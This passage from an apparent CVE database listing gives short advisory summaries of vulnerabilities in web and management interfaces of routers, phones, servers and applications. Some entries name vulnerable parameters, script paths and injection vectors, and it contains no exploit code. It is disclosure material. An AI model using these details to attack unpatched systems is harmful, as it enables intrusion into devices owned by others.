CVE-2002-1603. [CVE-2009-0473] Open redirect vulnerability in the web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2009-0472] Multiple cross-site scripting (XSS) vulnerabilities in the web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0164] The web interface for CUPS before 1.3.10 does not validate the HTTP Host header in a client request, which makes it easier for remote attackers to conduct DNS rebinding attacks. [CVE-2009-0030] A certain Red Hat patch for SquirrelMail 1.4.8 sets the same SQMSESSID cookie value for all sessions, which allows remote authenticated users to access other users' folder lists and configuration data in opportunistic circumstances by using the standard webmail.php interface. NOTE: this vulnerability exists because of an incorrect fix for CVE-2008-3663. [CVE-2008-7283] Open Ticket Request System (OTRS) before 2.2.6, when customer group support is enabled, allows remote authenticated users to bypass intended access restrictions and perform web-interface updates to tickets by leveraging queue read permissions. [CVE-2008-7166] Buffer overflow in the web interface in BitTorrent 6.0.1 (build 7859) and earlier, and uTorrent 1.7.6 (build 7859) and earlier, allows remote attackers to cause a denial of service (memory consumption and crash) via a crafted Range header. NOTE: this is probably a different vulnerability than CVE-2008-0071 and CVE-2008-0364. [CVE-2008-7115] The web interface to the Belkin Wireless G router and ADSL2 modem F5D7632-4V6 with firmware 6.01.08 allows remote attackers to bypass authentication and gain administrator privileges via a direct request to (1) statusprocess.exe, (2) system_all.exe, or (3) restore.exe in cgi-bin/. NOTE: the setup_dns.exe vector is already covered by CVE-2008-1244. [CVE-2008-6954] The web interface (CobblerWeb) in Cobbler before 1.2.9 allows remote authenticated users to execute arbitrary Python code in cobblerd by editing a Cheetah kickstart template to import arbitrary Python modules. [CVE-2008-6830] The disconnection feature in Citrix Web Interface 5.0 and 5.0.1 for Java Application Servers does not properly terminate a user's web interface session, which allows attackers with access to the same browser instance to gain access to the user's Web Interface session. NOTE: the attacker must also have valid credentials to the Web Interface. [CVE-2008-6711] Unspecified vulnerability in the Web administration interface in Avaya Communication Manager 3.1.x before CM 3.1.4 SP2 and 4.0.x before 4.0.3 SP1 allows remote authenticated users to execute arbitrary commands via unknown vectors related to "viewing system logs." [CVE-2008-6710] Unspecified vulnerability in the Web administration interface in Avaya Communication Manager 3.1.x before CM 3.1.4 SP2 and 4.0.x before 4.0.3 SP1 allows remote authenticated administrators to gain root privileges via unknown vectors related to "configuring data viewing or restoring credentials." [CVE-2008-6709] Unspecified vulnerability in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, allows remote authenticated users to execute arbitrary commands via unknown vectors related to configuration of "local data viewing or restoring parameters." [CVE-2008-6708] Unspecified vulnerability in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x and 4.x, allows remote authenticated administrators to gain root privileges via unknown vectors related to configuration of "data viewing or restoring parameters." [CVE-2008-6707] The Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, does not perform authentication for certain functionality, which allows remote attackers to obtain sensitive information and access restricted functionality via (1) the certificate installation utility, (2) unspecified scripts in the objects folder, (3) an "unnecessary default application," (4) unspecified scripts in the states folder, (5) an unspecified "default application" that lists server configuration, and (6) "full system help." [CVE-2008-6706] Multiple unspecified vulnerabilities in the Web management interface in Avaya SIP Enablement Services (SES) 3.x and 4.0, as used with Avaya Communication Manager 3.1.x, allow remote attackers to obtain (1) application server configuration, (2) database server configuration including encrypted passwords, (3) a system utility that decrypts "subscriber table passwords," (4) a system utility that decrypts database passwords, and (5) a system utility that encrypts "subscriber table passwords." [CVE-2008-6605] Cross-site request forgery (CSRF) vulnerability in the xslt script in the web-based management interface on the 2wire 1701HG, 1800HW, 2071HG, and 2700HG with firmware 3.17.5, 3.7.1, 4.25.19, or 5.29.51 allows remote attackers to hijack the intranet connectivity of arbitrary users for requests that cause a denial of service (network outage) via a page parameter with a % (percent) character followed by a non-alphanumeric character. [CVE-2008-6573] Multiple SQL injection vulnerabilities in Avaya SIP Enablement Services (SES) in Avaya Avaya Communication Manager 3.x, 4.0, and 5.0 (1) allow remote attackers to execute arbitrary SQL commands via unspecified vectors related to profiles in the SIP Personal Information Manager (SPIM) in the web interface [CVE-2008-6479] Cross-site request forgery (CSRF) vulnerability in the "change password" feature in the VZPP web interface for Parallels Virtuozzo 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to modify the password via a link or IMG tag to vz/cp/pwd. [CVE-2008-6478] Cross-site request forgery (CSRF) vulnerability in the file manager in the VZPP web interface for Parallels Virtuozzo 365.6.swsoft (build 4.0.0-365.6.swsoft) and 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to create and delete arbitrary files as the administrator via a link or IMG tag to (1) create-file and (2) list-control in vz/cp/vzdir/infrman/envs/files/ [CVE-2008-6395] The web management interface in 3Com Wireless 8760 Dual Radio 11a/b/g PoE Access Point allows remote attackers to cause a denial of service (device crash) via a malformed HTTP POST request. [CVE-2008-6229] Cross-site scripting (XSS) vulnerability in the administrative interface in Drupal Content Construction Kit (CCK) 5.x before 5.x-1.10 and 6.x before 6.x-2.0, a module for Drupal, allows remote authenticated users with "administer content" permissions to inject arbitrary web script or HTML via (1) field labels and (2) content-type names. [CVE-2008-6122] The web management interface in Netgear WGR614v9 allows remote attackers to cause a denial of service (crash) via a request that contains a question mark ("?"). [CVE-2008-6096] Cross-site scripting (XSS) vulnerability in Juniper NetScreen ScreenOS before 5.4r10, 6.0r6, and 6.1r2 allows remote attackers to inject arbitrary web script or HTML via the user name parameter to the (1) web interface login page or the (2) telnet login page. [CVE-2008-5906] Eval injection vulnerability in the web interface plugin in KTorrent before 3.1.4 allows remote attackers to execute arbitrary PHP code via unspecified parameters to this interface's PHP scripts. [CVE-2008-5905] The web interface plugin in KTorrent before 3.1.4 allows remote attackers to bypass intended access restrictions and upload arbitrary torrent files, and trigger the start of downloads and seeding, via a crafted HTTP POST request. [CVE-2008-5710] Multiple unspecified vulnerabilities in the web management interface in Avaya Communication Manager (CM) 3.1.x, 4.0.3, and 5.x allow remote attackers to read (1) configuration files, (2) log files, (3) binary image files, and (4) help files via unknown vectors. [CVE-2008-5709] Multiple unspecified vulnerabilities in the web management interface in Avaya Communication Manager (CM) 3.1 before 3.1.4 SP2, 4.0 before 4.0.3 SP1, and 5.0 before 5.0 SP3 allow remote authenticated users to execute arbitrary code via unknown attack vectors in the (1) Set Static Routes and (2) Backup History components. [CVE-2008-5517] The web interface in git (gitweb) 1.5.x before 1.5.6 allows remote attackers to execute arbitrary commands via shell metacharacters related to (1) git_snapshot and (2) git_object. [CVE-2008-5516] The web interface in git (gitweb) 1.5.x before 1.5.5 allows remote attackers to execute arbitrary commands via shell metacharacters related to git_search. [CVE-2008-5330] Multiple cross-site scripting (XSS) vulnerabilities in the web interface in ClearCase RWP server in IBM Rational ClearCase 7.0.0 before 7.0.0.4, and 7.0.1.1-RATL-RCC-IFIX02 and possibly other 7.0.1 versions before 7.0.1.3, allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO of a URI associated with a VOB page. [CVE-2008-5315] Directory traversal vulnerability in the web interface in Apple iPhone Configuration Web Utility 1.0 on Windows allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2008-5266] Cross-site scripting (XSS) vulnerability in configuration/httpListenerEdit.jsf in the GlassFish 2 UR2 b04 webadmin interface in Sun Java System Application Server 9.1_01 build b09d-fcs and 9.1_02 build b04-fcs allows remote attackers to inject arbitrary web script or HTML via the name parameter, a different vector than CVE-2008-2751. [CVE-2008-5184] The web interface (cgi-bin/admin.c) in CUPS before 1.3.8 uses the guest username when a user is not logged on to the web server, which makes it easier for remote attackers to bypass intended policy and conduct CSRF attacks via the (1) add and (2) cancel RSS subscription functions. [CVE-2008-5043] Multiple cross-site scripting (XSS) vulnerabilities in the web-based interface in IBM Metrica Service Assurance Framework allow remote authenticated users to inject arbitrary web script or HTML via (1) the elementid parameter in a generatedreportresults action to the ReportTree program, (2) the jnlpname parameter to the Launch program, or (3) the :tasklabel parameter to the ReportRequest program, related to the name of a report. [CVE-2008-4742] Multiple cross-site scripting (XSS) vulnerabilities in interface/Login.php in TimeTrex 2.2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) password and (2) user_name parameters. [CVE-2008-4419] Directory traversal vulnerability in the HP JetDirect web administration interface in the HP-ChaiSOE 1.0 embedded web server on the LaserJet 9040mfp, LaserJet 9050mfp, and Color LaserJet 9500mfp before firmware 08.110.9 [CVE-2008-4380] The web interface in Samsung DVR SHR2040 allows remote attackers to cause a denial of service (crash) via a malformed HTTP request, related to the filter for configuration properties and "/x" characters. [CVE-2008-4216] The plug-in interface in WebKit in Apple Safari before 3.2 does not prevent plug-ins from accessing local URLs, which allows remote attackers to obtain sensitive information via vectors that "launch local files." [CVE-2008-3939] Directory traversal vulnerability in the web interface in AVTECH PageR Enterprise before 5.0.7 allows remote attackers to read arbitrary files via directory traversal sequences in the URI. [CVE-2008-3936] The web interface in Dreambox DM500C allows remote attackers to cause a denial of service (application hang) via a long URI. [CVE-2008-3501] Cross-site scripting (XSS) vulnerability in the WebAccess simple interface in Novell Groupwise 7.0.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-3126] Multiple stack-based buffer overflows in the ServerView web interface (SnmpGetMibValues.exe) in Fujitsu Siemens Computers ServerView 04.60.07 and earlier allow remote authenticated users to execute arbitrary code via a crafted URL. [CVE-2008-3081] Multiple unspecified "input validation" vulnerabilities in the Web management interface (aka Messaging Administration interface) in Avaya Message Storage Server (MSS) 3.x and 4.0, and possibly Communication Manager 3.1.x, allow remote authenticated administrators to execute arbitrary commands as user vexvm via vectors related to (1) SFTP Remote Store configuration [CVE-2008-2929] Multiple cross-site scripting (XSS) vulnerabilities in the adminutil library in the Directory Server Administration Express and Directory Server Gateway (DSGW) web interface in Red Hat Directory Server 7.1 before SP7 and 8 EL4 and EL5, and Fedora Directory Server, allow remote attackers to inject arbitrary web script or HTML via input values that use % (percent) escaping. [CVE-2008-2824] Unspecified vulnerability in the Extensible Interface Platform in Web Services in Xerox WorkCentre 7655, 7665, and 7675 allows remote attackers to make configuration changes via unknown vectors. [CVE-2008-2814] Cross-site scripting (XSS) vulnerability in WallCity-Server Shoutcast Admin Panel 2.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter to the login interface. NOTE: the provenance of this information is unknown [CVE-2008-2751] Multiple cross-site scripting (XSS) vulnerabilities in the Glassfish webadmin interface in Sun Java System Application Server 9.1_01 allow remote attackers to inject arbitrary web script or HTML via the (1) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:jndiProp:JndiNew, (2) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:resTypeProp:resType, (3) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:factoryClassProp:factoryClass, or (4) propertyForm:propertyContentPage:propertySheet:propertSectionTextField:descProp:desc parameter to (a) resourceNode/customResourceNew.jsf [CVE-2008-2654] Off-by-one error in the read_client function in webhttpd.c in Motion 3.2.10 and earlier might allow remote attackers to execute arbitrary code via a long request to a Motion HTTP Control interface, which triggers a stack-based buffer overflow with some combinations of processor architecture and compiler. [CVE-2008-2474] Buffer overflow in x87 before 3.5.5 in ABB Process Communication Unit 400 (PCU400) 4.4 through 4.6 allows remote attackers to execute arbitrary code via a crafted packet using the (1) IEC60870-5-101 or (2) IEC60870-5-104 communication protocol to the X87 web interface. [CVE-2008-2272] Multiple cross-site scripting (XSS) vulnerabilities in the web interface in Aruba Mobility Controller 2.4.8.x-FIPS, 2.5.5.x, 2.5.6.x, 3.1.1.x, 3.2.0.x, and 3.3.1.x allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-2268] Open redirect vulnerability in interface/redirect.htm.php in Mjguest 6.7 GT Rev.01 allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the goto parameter in a redirect action to mjguest.php. NOTE: this is user-assisted because there is a delay and a notification before redirection occurs. [CVE-2008-2187] Cross-site scripting (XSS) vulnerability in mjguest.php in Mjguest 6.7 GT Rev.01 allows remote attackers to inject arbitrary web script or HTML via the level parameter in a redirect action, possibly involving interface/redirect.htm.php. [CVE-2008-2104] The WebService in Bugzilla 3.1.3 allows remote authenticated users without canconfirm privileges to create NEW or ASSIGNED bug entries via a request to the XML-RPC interface, which bypasses the canconfirm check. [CVE-2008-2071] Multiple cross-site request forgery (CSRF) vulnerabilities in the WHM interface 11.15.0 for cPanel 11.18 before 11.18.4 and 11.22 before 11.22.3 allow remote attackers to perform unauthorized actions as cPanel administrators via requests to cpanel/whm/webmail and other unspecified vectors. [CVE-2008-1548] Multiple cross-site scripting (XSS) vulnerabilities in Aeries Browser Interface (ABI) 3.8.3.14 in Eagle Software Aries Student Information System allow remote attackers to inject arbitrary web script or HTML via the (1) UserName parameter to loginproc.asp and the (2) usr parameter to Login.asp. [CVE-2008-1543] The Advanced User Interface Pages in the ProST Web Management component on the Airspan WiMAX ProST have a certain default User ID and password, which makes it easier for remote attackers to obtain partial administrative access, a different vulnerability than CVE-2008-1262. [CVE-2008-1503] Cross-site scripting (XSS) vulnerability in the web management interface in F5 BIG-IP 9.4.3 allows remote attackers to inject arbitrary web script or HTML via (1) the name of a node object, or the (2) sysContact or (3) sysLocation SNMP configuration field, aka "Audit Log XSS." NOTE: these issues might be resultant from cross-site request forgery (CSRF) vulnerabilities. [CVE-2008-1267] The Siemens SpeedStream 6520 router allows remote attackers to cause a denial of service (web interface crash) via an HTTP request to basehelp_English.htm with a large integer in the Content-Length field. [CVE-2008-1266] Multiple buffer overflows in the web interface on the D-Link DI-524 router allow remote attackers to cause a denial of service (device crash) or possibly have unspecified other impact via (1) a long username or (2) an HTTP header with a large name and an empty value. [CVE-2008-1260] Multiple cross-site request forgery (CSRF) vulnerabilities on the Zyxel P-2602HW-D1A router with 3.40(AJZ.1) firmware allow remote attackers to (1) make the admin web server available on the Internet (WAN) interface via the WWWAccessInterface parameter to Forms/RemMagWWW_1 or (2) change the IP whitelisting timeout via the StdioTimout parameter to Forms/rpSysAdmin_1. [CVE-2008-1251] Cross-site scripting (XSS) vulnerability in the web interface on the central phone server for the Snom 320 SIP Phone allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1250] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the central phone server for the Snom 320 SIP Phone allow remote attackers to perform actions as the phone user, as demonstrated by inserting an address-book entry containing an XSS sequence. [CVE-2008-1248] The web interface on the central phone server for the Snom 320 SIP Phone allows remote attackers to make arbitrary phone calls via the "Call a number" field. NOTE: this might overlap CVE-2007-3440. [CVE-2008-1247] The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. [CVE-2008-1202] Cross-site scripting (XSS) vulnerability in the web management interface in Adobe LiveCycle Workflow 6.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-1073] Cross-site scripting (XSS) vulnerability in the report interface in Internet Security Systems (ISS) Internet Scanner 7.0 Service Pack 2 Build 7.2.2005.52 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1052] The administration web interface in NetWin SurgeFTP 2.3a2 and earlier allows remote attackers to cause a denial of service (daemon crash) via a large integer in the Content-Length HTTP header, which triggers a NULL pointer dereference when memory allocation fails. [CVE-2008-1037] Cross-site scripting (XSS) vulnerability in the file listing function in the web management interface in Packeteer PacketShaper and PolicyCenter 8.2.2 allows remote attackers to inject arbitrary web script or HTML via the FILELIST parameter to an arbitrary component, which triggers injection into an Error Report page. [CVE-2008-0941] Cross-site scripting (XSS) vulnerability in Eagle Software Aeries Browser Interface (ABI) 3.8.2.8 allows remote authenticated users to inject arbitrary web script or HTML via an event. [CVE-2008-0925] Cross-site scripting (XSS) vulnerability in the iMonitor interface in Novell eDirectory 8.7.3.x before 8.7.3 sp10, and 8.8.x before 8.8.2 ftf2, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters that are used within "error messages of the HTTP stack." [CVE-2008-0838] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface in Sophos ES1000 and ES4000 Email Security Appliance 2.1.0.0 allow remote attackers to inject arbitrary web script or HTML via the (1) error and (2) go parameters to the login page. [CVE-2008-0564] Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636. [CVE-2008-0265] Multiple cross-site scripting (XSS) vulnerabilities in the Search function in the web management interface in F5 BIG-IP 9.4.3 allow remote attackers to inject arbitrary web script or HTML via the SearchString parameter to (1) list_system.jsp, (2) list_pktfilter.jsp, (3) list_ltm.jsp, (4) resources_audit.jsp, and (5) list_asm.jsp in tmui/Control/jspmap/tmui/system/log/ [CVE-2008-0071] The Web UI interface in (1) BitTorrent before 6.0.3 build 8642 and (2) uTorrent before 1.8beta build 10524 allows remote attackers to cause a denial of service (application crash) via an HTTP request with a malformed Range header. [CVE-2007-6730] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in the ZyXEL P-330W router allow remote attackers to hijack the authentication of administrators for requests that (1) enable remote router management via goform/formRmtMgt or (2) modify the administrator password via goform/formPasswordSetup. [CVE-2007-6729] Cross-site scripting (XSS) vulnerability in the web management interface in the ZyXEL P-330W router allows remote attackers to inject arbitrary web script or HTML via the pingstr parameter and other unspecified vectors. [CVE-2007-6700] Cross-site scripting (XSS) vulnerability in cgi-bin/bgplg in the web interface for the BGPD daemon in OpenBSD 4.1 allows remote attackers to inject arbitrary web script or HTML via the cmd parameter. [CVE-2007-6477] Cross-site scripting (XSS) vulnerability in the on-line help feature in Citrix Web Interface 2.0 and earlier, and NFuse, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-6193] The web management interface in Citrix NetScaler 8.0 build 47.8 stores the device's primary IP address in a cookie, which might allow remote attackers to obtain sensitive network configuration information if this address is not the same as the address being used by the web interface. [CVE-2007-6192] The web management interface in Citrix NetScaler 8.0 build 47.8 uses weak encryption (XOR of unpadded data) to store credentials within a cookie, which makes it easier for remote attackers to obtain cleartext credentials when a cookie is captured via a known-plaintext attack. [CVE-2007-6054] Cross-site scripting (XSS) vulnerability in the login page in the management interface in the Aruba 800 Mobility Controller 2.5.4.18 and earlier, and 2.4.8.6-FIPS and earlier, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the /screens URI, related to the url variable. [CVE-2007-5930] Cross-site scripting (XSS) vulnerability in the web interface in Cerberus FTP Server before 2.46 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5703] Multiple cross-site scripting (XSS) vulnerabilities in (1) Request-spk.xuda and (2) Add-msie-request.xuda in RSA KEON Registration Authority Web Interface 1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-5539] Unspecified vulnerability in Cisco Unified Intelligent Contact Management Enterprise (ICME), Unified ICM Hosted (ICMH), Unified Contact Center Enterprise (UCCE), Unified Contact Center Hosted (UCCH), and System Unified Contact Center Enterprise (SUCCE) 7.1(5) allows remote authenticated users to gain privileges, and read reports or change the SUCCE configuration, via certain web interfaces, aka CSCsj55686. [CVE-2007-5419] The 3Com 3CRWER100-75 router with 1.2.10ww software, when enabling an optional virtual server, configures this server to accept all source IP addresses on the external (Internet) interface unless the user selects other options, which might expose the router to unintended incoming traffic from remote attackers, as demonstrated by setting up a virtual server on port 80, which allows remote attackers to access the web management interface. [CVE-2007-5058] Cross-site scripting (XSS) vulnerability in the Web administration interface in Barracuda Spam Firewall before firmware 3.5.10.016 allows remote attackers to inject arbitrary web script or HTML via the username field in a login attempt, which is not properly handled when the Monitor Web Syslog screen is open. [CVE-2007-5046] Cross-site scripting (XSS) vulnerability in the Webmail interface for IceWarp Merak Mail Server before 9.0.0 allows remote attackers to inject arbitrary JavaScript via a javascript: URI in an attribute of an element in an email message body, as demonstrated by the onload attribute in a BODY element. [CVE-2007-4733] The Aztech DSL600EU router, when WAN access to the web interface is disabled, does not properly block inbound traffic on TCP port 80, which allows remote attackers to connect to the web interface by guessing a TCP sequence number, possibly involving spoofing of an ARP packet, a related issue to CVE-1999-0077. [CVE-2007-4592] Multiple cross-site scripting (XSS) vulnerabilities in the web interface for IBM Rational ClearQuest before 2003.06.16 Patch 2008A, 7.0.0.2_iFix01, and 7.0.1.1_iFix01 allow remote attackers to inject arbitrary web script or HTML via the (1) contextid, (2) username, (3) userNameVal, and (4) schema parameters to the login component. [CVE-2007-4555] Cross-site scripting (XSS) vulnerability in Ipswitch WS_FTP allows remote attackers to inject arbitrary web script or HTML via arguments to a valid command, which is not properly handled when it is displayed by the view log option in the administration interface. NOTE: this can be leveraged to create a new admin account. [CVE-2007-4539] The WebService (XML-RPC) interface in Bugzilla 2.23.3 through 3.0.0 does not enforce permissions for the time-tracking fields of bugs, which allows remote attackers to obtain sensitive information via certain XML-RPC requests, as demonstrated by the (1) Deadline and (2) Estimated Time fields. [CVE-2007-4529] The WebAdmin interface in TeamSpeak Server 2.0.20.1 allows remote authenticated users with the ServerAdmin flag to assign Registered users certain privileges, resulting in a privilege set that extends beyond that ServerAdmin's own servers, as demonstrated by the (1) AdminAddServer, (2) AdminDeleteServer, (3) AdminStartServer, and (4) AdminStopServer privileges [CVE-2007-4350] Cross-site scripting (XSS) vulnerability in the management interface in HP SiteScope 9.0 build 911 allows remote attackers to inject arbitrary web script or HTML via an SNMP trap message. [CVE-2007-4348] Cross-site scripting (XSS) vulnerability in the CAD service in IBM Tivoli Storage Manager (TSM) Client 5.3.5.3 and 5.4.1.2 for Windows allows remote attackers to inject arbitrary web script or HTML via HTTP requests to port 1581, which generate log entries in a dsmerror.log file that is accessible through a certain web interface. [CVE-2007-4318] Cross-site scripting (XSS) vulnerability in Forms/General_1 in the management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device allows remote authenticated administrators to inject arbitrary web script or HTML via the sysSystemName parameter. [CVE-2007-4301] Multiple cross-site scripting (XSS) vulnerabilities in the management interface in WebCart 2.20 through 2.25 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4122] Unspecified vulnerability in Hitachi JP1/Cm2/Hierarchical Viewer (HV) 06-00 through 06-71-/B allows remote attackers to cause a denial of service (application stop and web interface outage) via certain "unexpected data." [CVE-2007-4106] SQL injection vulnerability in login.asp in CodeWidgets Pay Roll - Time Sheet and Punch Card Application With Web Interface allows remote attackers to execute arbitrary SQL commands via the Password parameter. [CVE-2007-3769] Cross-site scripting (XSS) vulnerability in the mirrored server management interface in SurgeFTP 2.3a1 allows user-assisted, remote FTP servers to inject arbitrary web script or HTML via a malformed response without a status code, which is reflected to the user in the resulting error message. NOTE: this can be leveraged for root access via a sequence of steps involving web script that creates a new FTP user account. [CVE-2007-3572] Incomplete blacklist vulnerability in cgi-bin/runDiagnostics.cgi in the web interface on the Yoggie Pico and Pico Pro allows remote attackers to execute arbitrary commands via shell metacharacters in the param parameter, as demonstrated by URL encoded "`" (backtick) characters (%60 sequences). [CVE-2007-3263] Unspecified vulnerability in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1.0.7 and earlier has unknown impact and attack vectors, related to "incorrect authorization on a remote interface to the SDO repository." [CVE-2007-3151] rpttop.htm in the web management interface in Packeteer PacketShaper 7.3.0g2 and 7.5.0g1 allows remote attackers to cause a denial of service (device reboot) via a request with empty values of the OP.MEAS.DATAQUERY and MEAS.TYPE parameters. [CVE-2007-3012] The web interface in Fujitsu-Siemens Computers PRIMERGY BX300 Switch Blade allows remote attackers to obtain sensitive information by canceling the authentication dialog when accessing a sub-page, which still displays the form field contents of the sub-page, as demonstrated using (1) config/ip_management.htm and (2) config/snmp_config.htm. [CVE-2007-3011] The DBAsciiAccess CGI Script in the web interface in Fujitsu-Siemens Computers ServerView before 4.50.09 allows remote attackers to execute arbitrary commands via shell metacharacters in the Servername subparameter of the ParameterList parameter. [CVE-2007-2952] Multiple stack-based buffer overflows in the filter service (aka k9filter.exe) in Blue Coat K9 Web Protection 3.2.44 with Filter 3.2.32 allow (1) remote attackers to execute arbitrary code via a long HTTP Referer header to the K9 Web Protection Administration interface and (2) man-in-the-middle attackers to execute arbitrary code via an HTTP response with a long HTTP version field. [CVE-2007-2680] Cross-site scripting (XSS) vulnerability in the management interface in Canon Network Camera Server VB100 and VB101 with firmware 3.0 R69 and earlier, and VB150 with firmware 1.1 R39 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-2159] Multiple cross-site scripting (XSS) vulnerabilities in the Database Administration (dba) module 4.6.x-, and before 4.7.x-1.2 in the 4.7.x-1. series, for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors relating to (1) direct display of data from the database and (2) other portions of the user interface. [CVE-2007-1622] Cross-site scripting (XSS) vulnerability in wp-admin/vars.php in WordPress before 2.0.10 RC2, and before 2.1.3 RC2 in the 2.1 series, allows remote authenticated users with theme privileges to inject arbitrary web script or HTML via the PATH_INFO in the administration interface, related to loose regular expression processing of PHP_SELF. [CVE-2007-1485] DISPUTED Buffer overflow in the set_umask function in QFTP in LIBFtp 3.1-1 allows local users to execute arbitrary code via a long -m argument. NOTE: CVE disputes this issue because QFTP is not setuid, and it is unlikely that there are web interfaces to QFTP that would accept untrusted command line arguments. [CVE-2007-1426] The web interface in AstroCam 2.0.0 through 2.6.5 allows remote attackers to cause a denial of service (daemon shutdown) via requests that contain a large amount of data in the "a" variable, which "fills up the message queue." [CVE-2007-1229] Cross-site scripting (XSS) vulnerability in the Nullsoft ShoutcastServer 1.9.7 allows remote attackers to inject arbitrary web script or HTML via the top-level URI on the Incoming interface (port 8001/tcp), which is not properly handled in the administrator interface when viewing the log file. [CVE-2007-1169] The web interface in Trend Micro ServerProtect for Linux (SPLX) 1.25, 1.3, and 2.5 before 20070216 accepts logon requests through unencrypted HTTP, which might allow remote attackers to obtain credentials by sniffing the network. [CVE-2007-1168] Trend Micro ServerProtect for Linux (SPLX) 1.25, 1.3, and 2.5 before 20070216 allows remote attackers to access arbitrary web pages and reconfigure the product via HTTP requests with the splx_2376_info cookie to the web interface port (14942/tcp). [CVE-2007-1036] The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests. [CVE-2007-0564] The license registering interface in Symantec Web Security (SWS) before 3.0.1.85 allows attackers to cause a denial of service (CPU consumption) by submitting a large file. [CVE-2007-0011] The web portal interface in Citrix Access Gateway (aka Citrix Advanced Access Control) before Advanced Edition 4.5 HF1 places a session ID in the URL, which allows context-dependent attackers to hijack sessions by reading "residual information", including the a referer log, browser history, or browser cache. [CVE-2006-6539] Multiple buffer overflows in Winamp Web Interface (Wawi) 7.5.13 and earlier (1) allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via an (a) long username or a (b) crafted packet to the FindBasicAuth function in security.cpp, related to the /browse URI [CVE-2006-6514] Winamp Web Interface (Wawi) 7.5.13 and earlier uses an insufficient comparison to determine whether a directory is located below the application's root directory, which allows remote authenticated users to access certain other directories if the name of the root directory is a substring of the name of the target directory, as demonstrated by accessing C:\folder2 when the root directory is C:\folder. [CVE-2006-6513] The CControl::Download function (/dl URI) in Winamp Web Interface (Wawi) 7.5.13 and earlier allows remote authenticated users to download arbitrary file types under the root via a trailing "." (dot) in a filename in the file parameter, related to erroneous behavior of the IsWinampFile function. [CVE-2006-6512] Directory traversal vulnerability in the Browse function (/browse URI) in Winamp Web Interface (Wawi) 7.5.13 and earlier allows remote authenticated users to list arbitrary directories via URL encoded backslashes ("%2F") in the path parameter. [CVE-2006-6454] execInBackground.php in J-OWAMP Web Interface 2.1b and earlier allows remote attackers to execute arbitrary commands via shell metacharacters to the (1) exe and (2) args parameters, which are used in an exec function call. NOTE: the provenance of this information is unknown [CVE-2006-6453] PHP remote file inclusion vulnerability in JOWAMP_ShowPage.php in J-OWAMP Web Interface 2.1 allows remote authenticated users to execute arbitrary PHP code via a URL in the link parameter. [CVE-2006-6434] Unspecified vulnerability in the Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.050.03.000, 13.x before 13.050.03.000, and 14.x before 14.050.03.000 allows remote attackers to bypass authentication controls via unknown vectors. [CVE-2006-6427] The Web User Interface in Xerox WorkCentre and WorkCentre Pro before 12.060.17.000, 13.x before 13.060.17.000, and 14.x before 14.060.17.000 allows remote attackers to execute arbitrary commands via unspecified vectors involving "command injection" in (1) the TCP/IP hostname, (2) Scan-to-mailbox folder names, and (3) certain parameters in the Microsoft Networking configuration. NOTE: vector 1 might be the same as CVE-2006-5290. [CVE-2006-5862] Directory traversal vulnerability in the session mechanism of the web interface for Network Administration Visualized (NAV) before 3.1.1 allows attackers with filesystem write access to have an unknown impact via unknown attack vectors. [CVE-2006-5743] Multiple cross-site scripting (XSS) vulnerabilities in Highwall Enterprise and Highwall Endpoint 4.0.2.11045 management interface allow remote attackers to inject arbitrary web script or HTML via (1) an Access Point with a crafted SSID, (2) the name 